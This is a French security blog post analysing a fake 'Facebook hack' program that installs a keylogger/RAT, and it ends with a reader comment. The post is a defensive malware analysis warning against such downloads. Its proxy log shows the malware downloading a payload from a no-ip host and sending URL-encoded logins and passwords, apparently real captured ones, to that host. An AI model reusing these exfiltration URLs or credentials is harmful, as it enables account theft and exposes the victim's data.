Facebook Hack : Comment installer KeyLogger

Un billet sur le SPAM utilisant le service pastebin (service qui permet de copier/coller des documents pour les transmettre à ses correspondants, en général, du code).
Dans notre exemple, le SPAM  donne des liens de programme qui permettent d’hacker des comptes Facebook.

Bref, une personne qui veux se la jouer hackeur risque de tomber sur ces SPAM via Googlet et suivre les liens proposés…

Certains liens vont simplement vers des sites de vidéo en ligne bourrés de pubs.
D’autres proposes des fichiers à télécharger sous couvert de programmes pour hacker des comptes Facebook.
Un beau exe hébergé sur le service de mise en ligne de fichiers mediafire – Ca pue le bon malware !

http://www3.malekal.com/malwares/index.php?&hash=2c7102bf13950ca90aef105c3328f20d

0 sur VirusTotal : http://www.virustotal.com/file-scan/report.html?id=9618aef261d9886cf3700229047d375d91c5c3d632bdce702582476f13de04a1-1316435637
File name: 2c7102bf13950ca90aef105c3328f20d
Submission date: 2011-09-19 12:33:57 (UTC)
Current status: finished
Result: 0/ 44 (0.0%)

On voit que le fichier Facebook.exe est écrit en .Net Ce dernier dropper un fichier %TEMP%\vbc.exe

ce dernier manipule la configuration du pare-feu de Windows

Télécharge un autre malware et le droppe avec un nom aléatoire dans %TEMP% http://www3.malekal.com/malwares/index.php?&hash=5595fed1ad1943e68585e1052d00d58f Toujours 0 sur VirusTotal : http://www.virustotal.com/file-scan/report.html?id=052764084f204cc4f55f531d206de02f8be5b36389c7cc69c789684de2855339-1316436097

File name: 5595fed1ad1943e68585e1052d00d58f
Submission date: 2011-09-19 12:41:37 (UTC)
Current status: finished
Result: 0/ 43 (0.0%)

vbc semble avoir des fonctionnalités de keyloggers.

Les communications HTTP :
1316435953.727   1978 192.168.1.27 TCP_MISS/200 510 GET http://api.ipinfodb.com/v2/ip_query_country.php?key=1d1bb511aed00402daada8d8706f74b477e3172d0ca020deab3b43c16441a73d&timezone=off - DIRECT/67.212.77.13 text/xml
1316435989.639  35806 192.168.1.27 TCP_MISS/200 611736 GET http://ubuntu666box.no-ip.org/FUDIST.exe - DIRECT/94.10.206.167 application/x-msdos-program
1316435991.715    838 192.168.1.27 TCP_MISS/200 336 GET http://ubuntu666box.no-ip.org/index.php?action=add&a=10&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D&l=%61%72%6D%61%6E%64%6A%65%61%6E%70%6C%65%73%73%69%73%40%68%6F%74%6D%61%69%6C%2E%66%72&p=%63%61%63%61%62%6F%75%64%69%6E%34%31&c=%4D%41%4B%4B%4B - DIRECT/94.10.206.167 text/html
1316435992.086    366 192.168.1.27 TCP_MISS/200 336 GET http://ubuntu666box.no-ip.org/index.php?action=add&a=10&u=%68%74%74%70%73%3A%2F%2F%6C%6F%67%69%6E%2E%6C%69%76%65%2E%63%6F%6D&l=%61%72%6D%61%6E%64%6A%65%61%6E%70%6C%65%73%73%69%73%40%68%6F%74%6D%61%69%6C%2E%66%72&p=%6D%61%69%73%6F%6E%5F&c=%4D%41%4B%4B%4B - DIRECT/94.10.206.167 text/html

Ci-dessous les connexions effectuées par vbc.exe :

Le malware envoi des informations dont les processus ouverts, certainement les informations volées liés à ces processus (ce qui est saisi sur le clavier etc).
Un peu le même fonctionnement que sur ce billet : CyberGate @ Numericable
Très certainement un Spynet (se reporter à la page : RAT/CyberGate/SpyNet : Botnet pour les nuls)

 

Pour la petite histoire vbc est le compilateur .NET

Le malware doit compiler des bouts de codes.
Au final, le malware (Facebook.exe) est chargé dans vbc pour le contrôler.

Le malware est droppé dans %APPDATA% sous le nom server.exe

On retrouve dans data.dat les données volées, ci-dessus les commandes tapés dans l’invite de commandes qui sont transmises au Control Center plus haut.

Par contre, l’auteur a dû oublier de faire inscrire la clef au démarrage de Windows, car aucune clef écrite et le malware ne se lance plus lorsque l’on a redémarre l’ordinateur.

Conclusion

Encore un exemple de social engineering pour faire installer un malware, ici sous couvert d’une application de Hack sur Facebook.
Très souvent aussi, on peux avoir du SPAM par forum pour des cracks qui renvoie vers des services de téléchargement (rapidshare etc).
Bref éviter tout exécutable (et fichiers non sûrs) venant de ces services de téléchargement, en général, ce sont des RAT/CyberGate/SpyNet

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 142 times, 1 visits today)

4 thoughts on “Facebook Hack : Comment installer KeyLogger

  1. Quand l’ids gueule sur l’accès vbc.exe j’en personnellement vu les deux cas : l’injection dans un processus (le coup classique CreateProcess suspended) et effectivement la compilation d’une dll qu’il injecte ensuite en général dans explorer.exe.

    Compiler le truc a la volée et donc laisser le source trouvable par un bidouilleur, yen a qui on pas peur 🙂

    Joli article.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *